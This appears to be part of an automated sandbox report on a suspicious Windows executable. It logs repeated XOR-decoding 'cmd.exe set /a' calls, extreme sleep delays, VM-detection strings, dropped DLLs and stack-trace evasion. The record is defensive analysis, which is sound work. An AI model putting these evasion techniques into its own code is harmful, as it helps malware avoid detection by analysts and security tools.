Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_00405ECF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405ECF

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_10002D30 push eax; ret	0_2_10002D5E
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF2AF8 push eax; retf	131_2_33EF2AF9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF30E0 push esp; iretd	131_2_33EF30E1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF30D8 pushad ; iretd	131_2_33EF30D9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DD605F push eax; iretd	131_2_36DD605D
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DD6058 push eax; iretd	131_2_36DD605D

Source: C:\Users\user\Desktop\Revised PI_2024.exe	File created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	File created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	File created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	File created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsDialogs.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Revised PI_2024.exe

API/Special instruction interceptor: Address: 2A7FE63

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Memory allocated: 33F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Memory allocated: 33C80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsDialogs.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Revised PI_2024.exe

API coverage: 2.4 %

Source: C:\Users\user\Desktop\Revised PI_2024.exe TID: 3036	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe TID: 3036	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405464
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00405EA8 FindFirstFileA,FindClose,	0_2_00405EA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00402645 FindFirstFileA,	131_2_00402645
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	131_2_00405464
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00405EA8 FindFirstFileA,FindClose,	131_2_00405EA8

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcaae449bca96b<
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.0000000003707000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.0000000003728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh1q

Source: C:\Users\user\Desktop\Revised PI_2024.exe	API call chain: ExitProcess graph end node			graph_0-3695
Source: C:\Users\user\Desktop\Revised PI_2024.exe	API call chain: ExitProcess graph end node			graph_0-3852

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_00405ECF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405ECF

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
